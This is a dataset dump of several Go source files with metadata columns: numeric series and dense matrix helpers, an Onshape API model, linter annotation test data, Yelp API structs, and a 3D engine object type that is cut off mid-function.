code stringlengths 114 1.05M | path stringlengths 3 312 | quality_prob float64 0.5 0.99 | learning_prob float64 0.2 1 | filename stringlengths 3 168 | kind stringclasses 1 value |
|---|---|---|---|---|---|
package godata
import "sort"
type FloatSeries struct {
data []float64
}
func NewFloatSeries(data ...float64) FloatSeries {
return FloatSeries{data: data}
}
func (f FloatSeries) Append(elements ...float64) FloatSeries {
changed := f.Clone()
changed.data = append(changed.data, elements...)
return f
}
func (f FloatSeries) Apply(oper func(float64) float64) FloatSeries {
changed := FloatSeries{}
for _, entry := range f.data {
changed.data = append(changed.data, oper(entry))
}
return changed
}
func (f FloatSeries) Clone() FloatSeries {
cloned := FloatSeries{}
cloned.data = append(cloned.data, f.data...)
return cloned
}
func (f FloatSeries) Sum() float64 {
sum := float64(0)
for _, entry := range f.data {
sum += entry
}
return sum
}
func (f FloatSeries) Size() int {
return len(f.data)
}
func (f FloatSeries) Avg() float64 {
return f.Sum() / float64(f.Size())
}
func (f FloatSeries) Sort() FloatSeries {
sorted := f.Clone()
sort.Slice(sorted.data, func(i, j int) bool {
return sorted.data[i] < sorted.data[j]
})
return sorted
}
func (f FloatSeries) Max() (pos int, max float64) {
for x, entry := range f.data {
if max < entry {
max = entry
pos = x
}
}
return pos, max
}
func (f FloatSeries) Min() (pos int, min float64) {
for x, entry := range f.data {
if min > entry {
min = entry
pos = x
}
}
return pos, min
}
func (f FloatSeries) Index(index int) float64 {
return f.data[index]
}
func (f FloatSeries) Concat(x FloatSeries) FloatSeries {
return NewFloatSeries(append(f.data, x.data...)...)
}
func (f FloatSeries) Subset(start int, end int) FloatSeries {
return NewFloatSeries(f.data[start:end]...)
}
func (f FloatSeries) PassThrough(filter TruthFilter) FloatSeries {
var data []float64
for index, pass := range filter {
if pass && index < f.Size() {
data = append(data, f.Index(index))
}
}
return NewFloatSeries(data...)
}
func (f FloatSeries) GreaterThan(value float64) (greater TruthFilter) {
for _, entry := range f.data {
greater = append(greater, entry > value)
}
return greater
}
func (f FloatSeries) SmallerThan(value float64) (smaller TruthFilter) {
for _, entry := range f.data {
smaller = append(smaller, entry < value)
}
return smaller
}
func (f FloatSeries) Find(val float64) int {
for index, entry := range f.data {
if entry == val {
return index
}
}
return -1
}
func (f FloatSeries) Filter(accept func(float64) bool) (filter TruthFilter) {
for _, val := range f.data {
filter = append(filter, accept(val))
}
return filter
} | floatseries.go | 0.780244 | 0.520009 | floatseries.go | starcoder |
package f64
import (
"context"
"log"
)
// DenseMatrix a dense matrix
type DenseMatrix struct {
c int // number of rows in the sparse matrix
r int // number of columns in the sparse matrix
data [][]float64
}
// NewDenseMatrix returns a DenseMatrix
func NewDenseMatrix(r, c int) *DenseMatrix {
return newMatrix(r, c, nil)
}
// NewDenseMatrixFromArray returns a DenseMatrix
func NewDenseMatrixFromArray(data [][]float64) *DenseMatrix {
r := len(data)
c := len(data[0])
s := &DenseMatrix{data: data, r: r, c: c}
return s
}
func newMatrix(r, c int, initialise func([]float64, int)) *DenseMatrix {
s := &DenseMatrix{data: make([][]float64, r), r: r, c: c}
for i := 0; i < r; i++ {
s.data[i] = make([]float64, c)
if initialise != nil {
initialise(s.data[i], i)
}
}
return s
}
// Columns the number of columns of the matrix
func (s *DenseMatrix) Columns() int {
return s.c
}
// Rows the number of rows of the matrix
func (s *DenseMatrix) Rows() int {
return s.r
}
// Update does a At and Set on the matrix element at r-th, c-th
func (s *DenseMatrix) Update(r, c int, f func(float64) float64) {
if r < 0 || r >= s.Rows() {
log.Panicf("Row '%+v' is invalid", r)
}
if c < 0 || c >= s.Columns() {
log.Panicf("Column '%+v' is invalid", c)
}
s.data[r][c] = f(s.data[r][c])
return
}
// At returns the value of a matrix element at r-th, c-th
func (s *DenseMatrix) At(r, c int) float64 {
if r < 0 || r >= s.Rows() {
log.Panicf("Row '%+v' is invalid", r)
}
if c < 0 || c >= s.Columns() {
log.Panicf("Column '%+v' is invalid", c)
}
return s.data[r][c]
}
// Set sets the value at r-th, c-th of the matrix
func (s *DenseMatrix) Set(r, c int, value float64) {
if r < 0 || r >= s.Rows() {
log.Panicf("Row '%+v' is invalid", r)
}
if c < 0 || c >= s.Columns() {
log.Panicf("Column '%+v' is invalid", c)
}
s.data[r][c] = value
}
// ColumnsAt return the columns at c-th
func (s *DenseMatrix) ColumnsAt(c int) Vector {
if c < 0 || c >= s.Columns() {
log.Panicf("Column '%+v' is invalid", c)
}
columns := NewDenseVector(s.r)
for r := 0; r < s.r; r++ {
columns.SetVec(r, s.data[r][c])
}
return columns
}
// RowsAt return the rows at r-th
func (s *DenseMatrix) RowsAt(r int) Vector {
if r < 0 || r >= s.Rows() {
log.Panicf("Row '%+v' is invalid", r)
}
rows := NewDenseVector(s.c)
for i := 0; i < s.c; i++ {
rows.SetVec(i, s.data[r][i])
}
return rows
}
// RowsAtToArray return the rows at r-th
func (s *DenseMatrix) RowsAtToArray(r int) []float64 {
if r < 0 || r >= s.Rows() {
log.Panicf("Row '%+v' is invalid", r)
}
rows := make([]float64, s.c)
for i := 0; i < s.c; i++ {
rows[i] = s.data[r][i]
}
return rows
}
// Copy copies the matrix
func (s *DenseMatrix) Copy() Matrix {
v := 0.0
matrix := newMatrix(s.Rows(), s.Columns(), func(row []float64, r int) {
for c := 0; c < s.Columns(); c++ {
v = s.data[r][c]
if v != 0.0 {
row[c] = v
} else {
row[c] = v
}
}
})
return matrix
}
// Scalar multiplication of a matrix by alpha
func (s *DenseMatrix) Scalar(alpha float64) Matrix {
return Scalar(context.Background(), s, alpha)
}
// Multiply multiplies a matrix by another matrix
func (s *DenseMatrix) Multiply(m Matrix) Matrix {
matrix := newMatrix(s.Rows(), m.Columns(), nil)
MatrixMatrixMultiply(context.Background(), s, m, nil, matrix)
return matrix
}
// Add addition of a matrix by another matrix
func (s *DenseMatrix) Add(m Matrix) Matrix {
matrix := s.Copy()
Add(context.Background(), s, m, nil, matrix)
return matrix
}
// Subtract subtracts one matrix from another matrix
func (s *DenseMatrix) Subtract(m Matrix) Matrix {
matrix := m.Copy()
Subtract(context.Background(), s, m, nil, matrix)
return matrix
}
// Negative the negative of a matrix
func (s *DenseMatrix) Negative() Matrix {
matrix := s.Copy()
Negative(context.Background(), s, nil, matrix)
return matrix
}
// Transpose swaps the rows and columns
func (s *DenseMatrix) Transpose() Matrix {
matrix := newMatrix(s.Columns(), s.Rows(), nil)
Transpose(context.Background(), s, nil, matrix)
return matrix
}
// Equal the two matrices are equal
func (s *DenseMatrix) Equal(m Matrix) bool {
return Equal(context.Background(), s, m)
}
// NotEqual the two matrices are not equal
func (s *DenseMatrix) NotEqual(m Matrix) bool {
return NotEqual(context.Background(), s, m)
}
// Size of the matrix
func (s *DenseMatrix) Size() int {
return s.r * s.c
}
// Values the number of elements in the matrix
func (s *DenseMatrix) Values() int {
return s.r * s.c
}
// Clear removes all elements from a matrix
func (s *DenseMatrix) Clear() {
s.data = make([][]float64, s.r)
for i := 0; i < s.r; i++ {
s.data[i] = make([]float64, s.c)
}
}
// RawMatrix returns the raw matrix
func (s *DenseMatrix) RawMatrix() [][]float64 {
return s.data
}
// Enumerate iterates through all non-zero elements, order is not guaranteed
func (s *DenseMatrix) Enumerate() Enumerate {
return s.iterator()
}
func (s *DenseMatrix) iterator() *denseMatrixIterator {
i := &denseMatrixIterator{
matrix: s,
size: s.Values(),
last: 0,
c: 0,
r: 0,
}
return i
}
type denseMatrixIterator struct {
matrix *DenseMatrix
size int
last int
c int
r int
cOld int
rOld int
}
// HasNext checks the iterator has any more values
func (s *denseMatrixIterator) HasNext() bool {
if s.last >= s.size {
return false
}
return true
}
func (s *denseMatrixIterator) next() {
if s.c == s.matrix.Columns() {
s.c = 0
s.r++
}
s.cOld = s.c
s.c++
s.last++
}
// Next moves the iterator and returns the row, column and value
func (s *denseMatrixIterator) Next() (int, int, float64) {
s.next()
return s.r, s.cOld, s.matrix.At(s.r, s.cOld)
}
// Map replace each element with the result of applying a function to its value
func (s *DenseMatrix) Map() Map {
t := s.iterator()
i := &denseMatrixMap{t}
return i
}
type denseMatrixMap struct {
*denseMatrixIterator
}
// HasNext checks the iterator has any more values
func (s *denseMatrixMap) HasNext() bool {
return s.denseMatrixIterator.HasNext()
}
// Map move the iterator and uses a higher order function to changes the elements current value
func (s *denseMatrixMap) Map(f func(int, int, float64) float64) {
s.next()
s.matrix.Set(s.r, s.cOld, f(s.r, s.cOld, s.matrix.At(s.r, s.cOld)))
}
// Element of the mask for each tuple that exists in the matrix for which the value of the tuple cast to Boolean is true
func (s *DenseMatrix) Element(r, c int) bool {
return s.element(r, c)
}
func (s *DenseMatrix) element(r, c int) bool {
return s.At(r, c) > 0
} | f64/denseMatrix.go | 0.849472 | 0.631367 | denseMatrix.go | starcoder |
package onshape
import (
"encoding/json"
)
// BTMSketchPoint158 struct for BTMSketchPoint158
type BTMSketchPoint158 struct {
BTMSketchGeomEntity5
BtType *string `json:"btType,omitempty"`
IsUserPoint *bool `json:"isUserPoint,omitempty"`
X *float64 `json:"x,omitempty"`
Y *float64 `json:"y,omitempty"`
}
// NewBTMSketchPoint158 instantiates a new BTMSketchPoint158 object
// This constructor will assign default values to properties that have it defined,
// and makes sure properties required by API are set, but the set of arguments
// will change when the set of required properties is changed
func NewBTMSketchPoint158() *BTMSketchPoint158 {
this := BTMSketchPoint158{}
return &this
}
// NewBTMSketchPoint158WithDefaults instantiates a new BTMSketchPoint158 object
// This constructor will only assign default values to properties that have it defined,
// but it doesn't guarantee that properties required by API are set
func NewBTMSketchPoint158WithDefaults() *BTMSketchPoint158 {
this := BTMSketchPoint158{}
return &this
}
// GetBtType returns the BtType field value if set, zero value otherwise.
func (o *BTMSketchPoint158) GetBtType() string {
if o == nil || o.BtType == nil {
var ret string
return ret
}
return *o.BtType
}
// GetBtTypeOk returns a tuple with the BtType field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BTMSketchPoint158) GetBtTypeOk() (*string, bool) {
if o == nil || o.BtType == nil {
return nil, false
}
return o.BtType, true
}
// HasBtType returns a boolean if a field has been set.
func (o *BTMSketchPoint158) HasBtType() bool {
if o != nil && o.BtType != nil {
return true
}
return false
}
// SetBtType gets a reference to the given string and assigns it to the BtType field.
func (o *BTMSketchPoint158) SetBtType(v string) {
o.BtType = &v
}
// GetIsUserPoint returns the IsUserPoint field value if set, zero value otherwise.
func (o *BTMSketchPoint158) GetIsUserPoint() bool {
if o == nil || o.IsUserPoint == nil {
var ret bool
return ret
}
return *o.IsUserPoint
}
// GetIsUserPointOk returns a tuple with the IsUserPoint field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BTMSketchPoint158) GetIsUserPointOk() (*bool, bool) {
if o == nil || o.IsUserPoint == nil {
return nil, false
}
return o.IsUserPoint, true
}
// HasIsUserPoint returns a boolean if a field has been set.
func (o *BTMSketchPoint158) HasIsUserPoint() bool {
if o != nil && o.IsUserPoint != nil {
return true
}
return false
}
// SetIsUserPoint gets a reference to the given bool and assigns it to the IsUserPoint field.
func (o *BTMSketchPoint158) SetIsUserPoint(v bool) {
o.IsUserPoint = &v
}
// GetX returns the X field value if set, zero value otherwise.
func (o *BTMSketchPoint158) GetX() float64 {
if o == nil || o.X == nil {
var ret float64
return ret
}
return *o.X
}
// GetXOk returns a tuple with the X field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BTMSketchPoint158) GetXOk() (*float64, bool) {
if o == nil || o.X == nil {
return nil, false
}
return o.X, true
}
// HasX returns a boolean if a field has been set.
func (o *BTMSketchPoint158) HasX() bool {
if o != nil && o.X != nil {
return true
}
return false
}
// SetX gets a reference to the given float64 and assigns it to the X field.
func (o *BTMSketchPoint158) SetX(v float64) {
o.X = &v
}
// GetY returns the Y field value if set, zero value otherwise.
func (o *BTMSketchPoint158) GetY() float64 {
if o == nil || o.Y == nil {
var ret float64
return ret
}
return *o.Y
}
// GetYOk returns a tuple with the Y field value if set, nil otherwise
// and a boolean to check if the value has been set.
func (o *BTMSketchPoint158) GetYOk() (*float64, bool) {
if o == nil || o.Y == nil {
return nil, false
}
return o.Y, true
}
// HasY returns a boolean if a field has been set.
func (o *BTMSketchPoint158) HasY() bool {
if o != nil && o.Y != nil {
return true
}
return false
}
// SetY gets a reference to the given float64 and assigns it to the Y field.
func (o *BTMSketchPoint158) SetY(v float64) {
o.Y = &v
}
func (o BTMSketchPoint158) MarshalJSON() ([]byte, error) {
toSerialize := map[string]interface{}{}
serializedBTMSketchGeomEntity5, errBTMSketchGeomEntity5 := json.Marshal(o.BTMSketchGeomEntity5)
if errBTMSketchGeomEntity5 != nil {
return []byte{}, errBTMSketchGeomEntity5
}
errBTMSketchGeomEntity5 = json.Unmarshal([]byte(serializedBTMSketchGeomEntity5), &toSerialize)
if errBTMSketchGeomEntity5 != nil {
return []byte{}, errBTMSketchGeomEntity5
}
if o.BtType != nil {
toSerialize["btType"] = o.BtType
}
if o.IsUserPoint != nil {
toSerialize["isUserPoint"] = o.IsUserPoint
}
if o.X != nil {
toSerialize["x"] = o.X
}
if o.Y != nil {
toSerialize["y"] = o.Y
}
return json.Marshal(toSerialize)
}
type NullableBTMSketchPoint158 struct {
value *BTMSketchPoint158
isSet bool
}
func (v NullableBTMSketchPoint158) Get() *BTMSketchPoint158 {
return v.value
}
func (v *NullableBTMSketchPoint158) Set(val *BTMSketchPoint158) {
v.value = val
v.isSet = true
}
func (v NullableBTMSketchPoint158) IsSet() bool {
return v.isSet
}
func (v *NullableBTMSketchPoint158) Unset() {
v.value = nil
v.isSet = false
}
func NewNullableBTMSketchPoint158(val *BTMSketchPoint158) *NullableBTMSketchPoint158 {
return &NullableBTMSketchPoint158{value: val, isSet: true}
}
func (v NullableBTMSketchPoint158) MarshalJSON() ([]byte, error) {
return json.Marshal(v.value)
}
func (v *NullableBTMSketchPoint158) UnmarshalJSON(src []byte) error {
v.isSet = true
return json.Unmarshal(src, &v.value)
} | onshape/model_btm_sketch_point_158.go | 0.72487 | 0.473109 | model_btm_sketch_point_158.go | starcoder |
// lint:file-ignore S1001 // want "Disabling of linter must have an annotation associated with it. Please visit https://transcom.github.io/mymove-docs/docs/dev/contributing/code-analysis/Guide-to-Static-Analysis-Annotations-for-Disabled-Linters"
//RA Summary: [linter] - [linter type code] - [Linter summary] // want "Please add the truss-is3 team as reviewers for this PR and ping the ISSO in #static-code-review Slack. Add label ‘needs-is3-review’ to this PR. For more info see https://transcom.github.io/mymove-docs/docs/dev/contributing/code-analysis/Guide-to-Static-Analysis-Security-Workflow"
//RA: <Why did the linter flag this line of code?>
//RA: <Why is this line of code valuable?>
//RA: <What mitigates the risk of negative impact?>
//RA Developer Status: {RA Request, RA Accepted, POA&M Request, POA&M Accepted, Mitigated, Need Developer Fix, False Positive, Bad Practice}
//RA Validator Status: {RA Accepted, Return to Developer, Known Issue, Mitigated, False Positive, Bad Practice}
//RA Modified Severity: CAT III
// lint:file-ignore SA1017
//RA Summary: staticcheck - SA2002 - Weak cryptographic hash // want "Please add the truss-is3 team as reviewers for this PR and ping the ISSO in #static-code-review Slack. Add label ‘needs-is3-review’ to this PR. For more info see https://transcom.github.io/mymove-docs/docs/dev/contributing/code-analysis/Guide-to-Static-Analysis-Security-Workflow"
//RA: This line was flagged because of the use of MD5 hashing
//RA: This line of code hashes the AWS object to be able to verify data integrity
//RA: Purpose of this hash is to protect against environmental risks, it does not
//RA: hash any sensitive user provided information such as passwords.
//RA: AWS S3 API requires use of MD5 to validate data integrity.
//RA Developer Status:
//RA Validator Status:
//RA Modified Severity: CAT III
// lint:file-ignore SA2002
//RA Summary: staticcheck - ST1021 - Unchecked return value
//RA: Linter flags errcheck error: Ignoring a method's return value can cause the program to overlook unexpected states and conditions.
//RA: Functions with unchecked return values in the file are used to close a local server connection to ensure a unit test server is not left running indefinitely
//RA: Given the functions causing the lint errors are used to close a local server connection for testing purposes, it is not deemed a risk
//RA Developer Status: Mitigated
//RA Validator Status: Mitigated
//RA Validator: <EMAIL>
//RA Modified Severity: N/A
// lint:file-ignore ST1021
package atotest
// lint:ignore // want "Please provide the rule that is being disabled"
func staticcheckShouldProvideRule() {}
// lint:ignore S1001 // want "Disabling of linter must have an annotation associated with it. Please visit https://transcom.github.io/mymove-docs/docs/dev/contributing/code-analysis/Guide-to-Static-Analysis-Annotations-for-Disabled-Linters"
func staticcheckShouldHaveAnnotation() {}
//RA Summary: [linter] - [linter type code] - [Linter summary] // want "Please add the truss-is3 team as reviewers for this PR and ping the ISSO in #static-code-review Slack. Add label ‘needs-is3-review’ to this PR. For more info see https://transcom.github.io/mymove-docs/docs/dev/contributing/code-analysis/Guide-to-Static-Analysis-Security-Workflow"
//RA: <Why did the linter flag this line of code?>
//RA: <Why is this line of code valuable?>
//RA: <What mitigates the risk of negative impact?>
//RA Developer Status: {RA Request, RA Accepted, POA&M Request, POA&M Accepted, Mitigated, Need Developer Fix, False Positive, Bad Practice}
//RA Validator Status: {RA Accepted, Return to Developer, Known Issue, Mitigated, False Positive, Bad Practice}
//RA Modified Severity: CAT III
// lint:ignore SA1017
func staticcheckAnnotationNotApprovedTemplate() {}
//RA Summary: staticcheck - SA2002 - Weak cryptographic hash // want "Please add the truss-is3 team as reviewers for this PR and ping the ISSO in #static-code-review Slack. Add label ‘needs-is3-review’ to this PR. For more info see https://transcom.github.io/mymove-docs/docs/dev/contributing/code-analysis/Guide-to-Static-Analysis-Security-Workflow"
//RA: This line was flagged because of the use of MD5 hashing
//RA: This line of code hashes the AWS object to be able to verify data integrity
//RA: Purpose of this hash is to protect against environmental risks, it does not
//RA: hash any sensitive user provided information such as passwords.
//RA: AWS S3 API requires use of MD5 to validate data integrity.
//RA Developer Status:
//RA Validator Status:
//RA Modified Severity: CAT III
// lint:ignore SA2002
func staticcheckAnnotationNotApprovedEmpty() {}
//RA Summary: staticcheck - ST1021 - Unchecked return value
//RA: Linter flags errcheck error: Ignoring a method's return value can cause the program to overlook unexpected states and conditions.
//RA: Functions with unchecked return values in the file are used to close a local server connection to ensure a unit test server is not left running indefinitely
//RA: Given the functions causing the lint errors are used to close a local server connection for testing purposes, it is not deemed a risk
//RA Developer Status: Mitigated
//RA Validator Status: Mitigated
//RA Validator: <EMAIL>
//RA Modified Severity: N/A
// lint:ignore ST1021
func staticcheckAnnotationApproved() {} | testdata/src/ato/staticcheck.go | 0.61057 | 0.492188 | staticcheck.go | starcoder |
package assign
import (
"reflect"
)
// Source represents any value which can be assigned to a Go value.
type Source interface {
// Kind is the reflection based kind of the type.
Kind() reflect.Kind
// Elem is the contained value of the pointer or interface.
Elem() Source
// FieldByName retrieves the field value of the struct by name.
FieldByName(string) Source
// Len is the length of the map, slice or array.
Len() int
// Index retrieves the element of the slice or array at the index.
Index(int) Source
// Pointer retrieves the underlying pointer of the value.
// This is used to prevent circular paths.
// Disable this from being used with the WithoutCycle option.
Pointer() uintptr
// MapRange provides a map iterator.
MapRange() MapIter
// Skip is how values are skipped for assignment.
// This can be useful for invalid or zero values.
Skip() bool
// Interface provides the underlying Go value.
// This is needed for basic Go types, e.g. bool, int, string, etc.
Interface() interface{}
}
// Of provides a Source from any given value.
// Handles Source directly, otherwise defaults to goSource
// which handles reflect.Value as well.
func Of(i interface{}) Source {
if val, ok := i.(Source); ok {
return val
}
return &goSource{val: valueOf(i)}
}
// valueOf provides the reflection value of the given Go value
// even if the Go value is a reflection value.
func valueOf(i interface{}) reflect.Value {
if val, ok := i.(reflect.Value); ok {
return val
}
return reflect.ValueOf(i)
}
// goSource satisfies Source for Go values.
type goSource struct {
val reflect.Value
}
func (v *goSource) Kind() reflect.Kind {
return v.val.Kind()
}
func (v *goSource) Elem() Source {
return &goSource{val: v.val.Elem()}
}
func (v *goSource) FieldByName(name string) Source {
return &goSource{val: v.val.FieldByName(name)}
}
func (v *goSource) Len() int {
return v.val.Len()
}
func (v *goSource) Index(i int) Source {
return &goSource{val: v.val.Index(i)}
}
func (v *goSource) Pointer() uintptr {
return v.val.Pointer()
}
func (v *goSource) MapRange() MapIter {
return &GoMapIter{it: v.val.MapRange()}
}
func (v *goSource) Skip() bool {
return !v.val.IsValid() || v.val.IsZero()
}
func (v *goSource) Interface() interface{} {
return v.val.Interface()
}
var _ Source = (*goSource)(nil)
// MapIter provides a way to iterate over maps types.
type MapIter interface {
Next() bool
Key() Source
Value() Source
}
// GoMapIter satisfies MapIter.
type GoMapIter struct {
it *reflect.MapIter
}
func (m *GoMapIter) Next() bool {
return m.it.Next()
}
func (m *GoMapIter) Key() Source {
return &goSource{val: m.it.Key()}
}
func (m *GoMapIter) Value() Source {
return &goSource{val: m.it.Value()}
}
var _ MapIter = (*GoMapIter)(nil) | source.go | 0.713731 | 0.407982 | source.go | starcoder |
package yelp
// A SearchResult is returned from the Search API. It includes
// the region, the total number of results, and a list of matching businesses.
// The business objects returned by this query are shallow - they will not include
// deep results such as reviews.
type SearchResult struct {
Region Region // Suggested bounds in a map to display results in
Total int // Total number of business results
Businesses []Business // The list of business entries (see Business)
}
// Region provides the location of a business obtained from search.
type Region struct {
Span Span // Span of suggested map bounds
Center Center // Center position of map bounds
}
// Span provides the variance of the location from the region in the search result.
type Span struct {
LatitudeDelta float32 `json:"latitude_delta"` // Latitude width of map bounds
LongitudeDelta float32 `json:"longitude_delta"` // Longitude height of map bounds
}
// Center provides the coordinate where the business is most likely to be located.
type Center struct {
Latitude float32 // Latitude position of map bounds center
Longitude float32 // Longitude position of map bounds center
}
// Deal defines a set of special offerings from the business.
type Deal struct {
ID string // Deal identifier
Title string // Deal title
URL string // Deal URL
ImageURL string `json:"image_URL"` // Deal image URL
CurrencyCode string `json:"currency_code"` // ISO_4217 Currency Code
TimeStart float32 `json:"time_start"` // Deal start time (Unix timestamp)
TimeEnd float32 `json:"time_end"` // Deal end time (optional: this field is present only if the Deal ends)
IsPopular bool `json:"is_popular"` // Whether the Deal is popular (optional: this field is present only if true)
WhatYouGet string `json:"what_you_get"` // Additional details for the Deal, separated by newlines
ImportantRestrictions string `json:"Important_restrictions"` // Important restrictions for the Deal, separated by newlines
AdditionalRestrictions string `json:"Additional_restrictions"` // Deal additional restrictions
Options []DealOption //Deal options
}
// DealOption provides options are optionally included on a deal.
type DealOption struct {
Title string // Deal option title
PurchaseURL string `json:"Purchase_URL"` // Deal option URL for purchase
Price float32 // Deal option price (in cents)
FormattedPrice string `json:"Formatted_price"` // Deal option price (formatted, e.g. "$6")
OriginalPrice float32 `json:"Original_price"` // Deal option original price (in cents)
FormattedOriginalPrice string `json:"Formatted_original_price"` // Deal option original price (formatted, e.g. "$12")
IsQuantityLimited bool `json:"Is_quantity_limited"` // Whether the deal option is limited or unlimited
RemainingCount float32 `json:"Remaining_count"` // The remaining deal options available for purchase (optional: this field is only present if the deal is limited)
}
// GiftCertificate defines optional data available on Businesses.
type GiftCertificate struct {
ID string // Gift certificate identifier
URL string // Gift certificate landing page URL
ImageURL string `json:"Image_URL"` // Gift certificate image URL
CurrencyCode string `json:"Currency_code"` // ISO_4217 Currency Code
UnusedBalances string `json:"Unused_balances"` // Whether unused balances are returned as cash or store credit
Options []GiftCertificateOptions // Gift certificate options
}
// GiftCertificateOptions can define a set of pricing options for a gift certificate.
type GiftCertificateOptions struct {
Price float32 // Gift certificate option price (in cents)
FormattedPrice string `json:"Formatted_price"` // Gift certificate option price (formatted, e.g. "$50")
}
// Review data contains a list of user reviews for a given Business (when queried using the Business API).
type Review struct {
ID string // Review identifier
Rating float32 // Rating from 1-5
RatingImageURL string `json:"Rating_image_URL"` // URL to star rating image for this business (size = 84x17)
RatingImageSmallURL string `json:"Rating_image_small_URL"` // URL to small version of rating image for this business (size = 50x10)
RatingImageLargeURL string `json:"Rating_image_large_URL"` // URL to large version of rating image for this business (size = 166x30)
Excerpt string // Review excerpt
TimeCreated float32 `json:"Time_created"` // Time created (Unix timestamp)
User User // User who wrote the review
}
// User data is linked off of reviews.
type User struct {
ID string // User identifier
ImageURL string `json:"Image_URL"` // User profile image URL
Name string // User name
}
// Coordinate data is used with location information.
type Coordinate struct {
Latitude float32 // Latitude of current location
Longitude float32 // Longitude of current location
}
// Location information defines the location of a given business.
type Location struct {
Coordinate Coordinate // Address for this business formatted for display. Includes all address fields, cross streets and city, state_code, etc.
Address []string // Address for this business. Only includes address fields.
DisplayAddress []string `json:"Display_address"` // Display address for the business.
City string // City for this business
StateCode string `json:"State_code"` // ISO 3166-2 state code for this business
PostalCode string `json:"Postal_code"` // Postal code for this business
CountryCode string `json:"Country_code"` // ISO 3166-1 country code for this business
CrossStreets string `json:"Cross_streets"` // Cross streets for this business
Neighborhoods []string // List that provides neighborhood(s) information for business
GeoAccuracy float32 `json:"Geo_accuracy"` // Geo accuracy for the location.
}
// Business information is returned in full from the business API, or shallow from the search API.
type Business struct {
ID string // Yelp ID for this business
Name string // Name of this business
ImageURL string `json:"Image_URL"` // URL of photo for this business
URL string // URL for business page on Yelp
MobileURL string `json:"Mobile_URL"` // URL for mobile business page on Yelp
Phone string // Phone number for this business with international dialing code (e.g. +442079460000)
DisplayPhone string `json:"Display_phone"` // Phone number for this business formatted for display
ReviewCount int `json:"Review_count"` // Number of reviews for this business
Categories [][]string // Provides a list of category name, alias pairs that this business is associated with. The alias is provided so you can search with the category_filter.
Distance float32 // Distance that business is from search location in meters, if a latitude/longitude is specified.
Rating float32 // Rating for this business (value ranges from 1, 1.5, ... 4.5, 5)
RatingImgURL string `json:"Rating_img_URL"` // URL to star rating image for this business (size = 84x17)
RatingImgURLSmall string `json:"Rating_img_URL_small"` // URL to small version of rating image for this business (size = 50x10)
RatingImgURLLarge string `json:"Rating_img_URL_large"` // URL to large version of rating image for this business (size = 166x30)
SnippetText string `json:"Snippet_text"` // Snippet text associated with this business
SnippetImageURL string `json:"Snippet_image_URL"` // URL of snippet image associated with this business
Location Location // Location data for this business
IsClaimed bool `json:"Is_claimed"` // Whether business has been claimed by a business owner
IsClosed bool `json:"Is_closed"` // Whether business has been (permanently) closed
MenuProvider string `json:"Menu_provider"` // Provider of the menu for this business
MenuDateUpdated float32 `json:"Menu_date_updated"` // Last time this menu was updated on Yelp (Unix timestamp)
Deals []Deal // Deal info for this business (optional: this field is present only if there’s a Deal)
GiftCertificates []GiftCertificate `json:"Gift_certificates"` // Gift certificate info for this business (optional: this field is present only if there are gift certificates available)
Reviews []Review // Contains one review associated with business
} | vendor/github.com/JustinBeckwith/go-yelp/yelp/business.go | 0.694406 | 0.455017 | business.go | starcoder |
package core
import (
"github.com/nuberu/engine/event"
"github.com/nuberu/engine/math"
)
const (
defaultMatrixAutoUpdate bool = true
)
var (
object3IdGenerator = new(IdGenerator)
)
type CameraObject interface {
IsCamera() bool
}
type Object3 struct {
id Id
Name string
parent *Object3
children []*Object3
up math.Vector3
Position math.Vector3
Rotation math.Euler
quaternion math.Quaternion
Scale math.Vector3
modelViewMatrix math.Matrix4
normalMatrix math.Matrix4
matrix math.Matrix4
matrixWorld math.Matrix4
matrixAutoUpdate bool
matrixWorldNeedsUpdate bool
layers Layers
Visible bool
castShadow bool
receiveShadow bool
frustumCulled bool
RenderOrder uint
beforeRenderEvent *event.Emitter
afterRenderEvent *event.Emitter
addEvent *event.Emitter // Event fired when the object is added to other
removeEvent *event.Emitter // Event fired when the object is removed from other
}
func NewObject() *Object3 {
return newObjectWithId(object3IdGenerator.Next())
}
func newObjectWithId(id Id) *Object3 {
obj := &Object3{
id: id,
Name: "",
parent: nil,
children: []*Object3{},
up: *math.NewVector3(0, 1, 0),
Position: math.Vector3{Vector2: math.Vector2{X: 0, Y: 0}, Z: 0},
Rotation: *math.NewDefaultEuler(),
quaternion: *math.NewDefaultQuaternion(),
Scale: math.Vector3{Vector2: math.Vector2{X: 1.0, Y: 1.0}, Z: 1.0},
modelViewMatrix: *math.NewDefaultMatrix4(),
normalMatrix: *math.NewDefaultMatrix4(),
matrix: *math.NewDefaultMatrix4(),
matrixWorld: *math.NewDefaultMatrix4(),
matrixAutoUpdate: defaultMatrixAutoUpdate,
matrixWorldNeedsUpdate: false,
layers: Layers{mask: 0},
Visible: true,
castShadow: false,
receiveShadow: false,
frustumCulled: true,
RenderOrder: 0,
beforeRenderEvent: event.NewEvent(),
afterRenderEvent: event.NewEvent(),
addEvent: event.NewEvent(),
removeEvent: event.NewEvent(),
}
obj.Rotation.OnChange().Always(obj.onEulerChange)
obj.quaternion.OnChange().Always(obj.onQuaternionChange)
return obj
}
func (obj *Object3) GetId() Id {
return obj.id
}
func (obj *Object3) IsCamera() bool {
return false
}
func (obj *Object3) IsVisible() bool {
return obj.Visible
}
func (obj *Object3) OnBeforeRender() *event.Handler {
return obj.beforeRenderEvent.GetHandler()
}
func (obj *Object3) OnAfterRender() *event.Handler {
return obj.afterRenderEvent.GetHandler()
}
func (obj *Object3) onQuaternionChange(sender interface{}, args *event.Args) {
}
func (obj *Object3) onEulerChange(sender interface{}, args *event.Args) {
}
func (obj *Object3) ApplyMatrix(matrix *math.Matrix4) {
obj.matrix.MultiplyMatrices(matrix, &obj.matrix)
obj.matrix.DeCompose(&obj.Position, &obj.quaternion, &obj.Scale)
}
func (obj *Object3) ApplyQuaternion(q *math.Quaternion) {
obj.quaternion.PreMultiply(q)
}
func (obj *Object3) SetRotationFromAxisAngle(axis *math.Vector3, angle math.Angle) {
obj.quaternion.SetFromAxisAngle(axis, angle)
}
func (obj *Object3) SetRotationFromEuler(euler *math.Euler) {
obj.quaternion.SetFromEuler(euler, true)
}
func (obj *Object3) SetRotationFromMatrix(m *math.Matrix4) {
obj.quaternion.SetFromRotationMatrix(m)
}
func (obj *Object3) SetRotationFromQuaternion(q *math.Quaternion) {
obj.quaternion.Copy(q)
}
func (obj *Object3) RotateOnAxis(axis *math.Vector3, angle math.Angle) {
